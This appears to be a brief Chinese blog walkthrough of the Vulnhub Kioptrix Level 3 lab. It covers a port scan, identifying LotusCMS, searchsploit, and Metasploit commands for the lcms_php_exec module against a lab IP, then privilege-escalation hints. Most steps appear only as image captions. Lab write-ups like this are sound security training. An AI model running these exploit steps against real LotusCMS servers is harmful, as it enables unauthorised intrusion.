Vulnhub靶机 kioptrix level 3

Vulnhub靶机 kioptrix level 3_第1张图片
简介里说了
先要配置hosts

Vulnhub靶机 kioptrix level 3_第2张图片
找靶机扫端口
80 22

Vulnhub靶机 kioptrix level 3_第3张图片
Vulnhub靶机 kioptrix level 3_第4张图片
登录界面
LotusCMS

Vulnhub靶机 kioptrix level 3_第5张图片
搜漏洞

searchsploit Lotus

Vulnhub靶机 kioptrix level 3_第6张图片
直接msf
设置RHOSTS、URI

search lotus
use exploit/multi/http/lcms_php_exec
show options
set RHOSTS 192.168.0.128
set URI /
run

Vulnhub靶机 kioptrix level 3_第7张图片Vulnhub靶机 kioptrix level 3_第8张图片
Vulnhub靶机 kioptrix level 3_第9张图片

提示用sudo ht
一个mysql账号

Vulnhub靶机 kioptrix level 3_第10张图片
Vulnhub靶机 kioptrix level 3_第11张图片

找到账号密码

Vulnhub靶机 kioptrix level 3_第12张图片Vulnhub靶机 kioptrix level 3_第13张图片

Vulnhub靶机 kioptrix level 3_第14张图片
Vulnhub靶机 kioptrix level 3_第15张图片
Vulnhub靶机 kioptrix level 3_第16张图片
这个靶机的解法不止一种

你可能感兴趣的:(vulnhub)